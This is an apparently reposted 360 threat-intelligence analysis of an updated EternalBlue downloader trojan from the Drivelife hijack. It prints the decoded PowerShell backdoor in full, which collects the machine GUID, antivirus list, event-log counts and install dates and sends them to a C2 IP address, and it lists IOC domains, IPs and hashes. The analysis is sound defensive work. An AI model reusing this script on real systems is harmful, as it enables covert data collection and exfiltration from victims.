内容简介:近日,360威胁中心发现“驱动人生”劫持木马事件中的永恒之蓝下载器木马再次更新,本次更新依旧是通过服务器调整云控指令,实现对木马下载模块的更新,通过永恒之蓝攻击后也会下载此模块。该模块会通过HTTP请求将在本机收集到的数据回传的C2服务器,然后从C&C服务器获取到加密的恶意代码下载链接。本次发现的新样本如下:其中一个组件释放一个powershell后门,但是该后门最后的代码有错误,应该是作者没有处理好导致后门无效。执行powershell的指令如下
近日,360威胁中心发现“驱动人生”劫持木马事件中的永恒之蓝下载器木马再次更新,本次更新依旧是通过服务器调整云控指令,实现对木马下载模块的更新,通过永恒之蓝攻击后也会下载此模块。该模块会通过HTTP请求将在本机收集到的数据回传的C2服务器,然后从C&C服务器获取到加密的恶意代码下载链接。
本次发现的新样本如下:
其中一个组件释放一个powershell后门,但是该后门最后的代码有错误,应该是作者没有处理好导致后门无效。执行powershell的指令如下
解码后为:
下载回来的powershell代码会收集受害者电脑上的MachineGuid、杀软列表、安全事件日志的条目数、计算机产品名、微软系统软件的安装日期然后POST到C&C服务器上,但是由于作者将$link变量作为参数传递时多加了双引号,导致下载链接不是$link的值而是字符串”$link”,所以该后门实际上是无效的,代码如下:
[string]$av = ""
[string]$avs = ""
[string]$log1 = ""
[string]$log2 = ""
[string]$vm = ""
[string]$softlist = ""
try{
[string]$key = (Get-ItemProperty registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\ -Name MachineGuid).MachineGUID
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
for($v = 0; $v -lt $avs.Count; $v++){
$av += $avs[$v] + "|"
}
}else{
$av = $avs
}
$log1 = (Get-EventLog -LogName 'Security' -After (get-date).AddDays(-7) -befor (get-date).AddDays(-3)).length
$log2 = (Get-EventLog -LogName 'Security' -After (get-date).AddDays(-2)).length
$vm = (get-wmiobject win32_computersystem | select-object -expand model)
$oldsoft = Get-Wmiobject Win32_Product | select-object -unique -expand InstallDate
for ($i = 0; $i -lt $oldsoft.length; $i++) {
$softlist += $oldsoft[$i] + "_"
}
}catch{}
$link = "http:// 68.183.178.71 /tt?p&key="+$key+"&av="+$av+"&log1="+$log1+"&log2="+$log2+"&vm="+$vm+"&soft="+$softlist
(New-Object Net.WebClient).downloadstring("$link")
总结
从360威胁情报平台中的数据可以看到该攻击团伙在2019年1月16-18日期间新注册了C&C域名、投放新样本,应该是最新的一次活动。目前,基于360威胁情报中心的威胁情报数据的全线产品,包括360威胁情报平台(TIP)、天眼高级威胁检测系统、360 NGSOC等,都已经支持对此攻击的检测。
IOC
oo.beahh.com
img.minicen.ga
t.minicen.ga
172.104.73.9:80
68.183.178.71:80
hxxp://172[.]104.73.9/dll.exe
637bf46077ad083659d3b96a010f38fe
e72d776ceb009a1ff4fb87b7b782aaf7
参考
2018年12月14日下午,360互联网安全中心监测到 “驱动人生”系列软件“人生日历”等升级程序分发恶意代码的活动,其中包括信息收集及挖矿木马,甚至还下发了利用永恒之蓝漏洞进行内网传播的程序,360威胁情报中心也对该供应链攻击案例的进行了分析和确认。360对于“驱动人生”劫持木马事件做了一系列的分析,详情如下表:
| 分析文章标题 | 发布日期 | 分析团队 |
| 《利用“驱动人生”升级程序的恶意程序预警》 | 2018.12.15 | 360互联网安全中心 |
| 《驱动人生旗下应用分发恶意代码事件分析 - 一个供应链攻击的案例》 | 2018.12.17 | 360威胁情报中心 |
| 《警报!“永恒之蓝”下载器木马再度更新!》 | 2018.12.19 | 360安全卫士 |
https://cert.360.cn/warning/detail?id=57cc079bc4686dd09981bf034130f1c9
https://ti.360.net/blog/articles/an-attack-of-supply-chain-by-qudongrensheng/
https://weibo.com/ttarticle/p/show?id=2309404318990783612243
声明:本文来自360威胁情报中心,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。
以上所述就是小编给大家介绍的《劫持“驱动人生”的挖矿蠕虫再次活跃》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- Window应急响应(二):蠕虫病毒
- Bluehero挖矿蠕虫变种空降!
- 西门子PLC蠕虫病毒研究
- 基于社交媒体的csrf蠕虫风暴探索
- 全新“Lucky蠕虫”爆发:专门感染魔兽地图
- 技术讨论 | 如何编写一段内存蠕虫?
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Persuasive Technology
B.J. Fogg / Morgan Kaufmann / 2002-12 / USD 39.95
Can computers change what you think and do? Can they motivate you to stop smoking, persuade you to buy insurance, or convince you to join the Army? "Yes, they can," says Dr. B.J. Fogg, directo......一起来看看 《Persuasive Technology》 这本书的介绍吧!
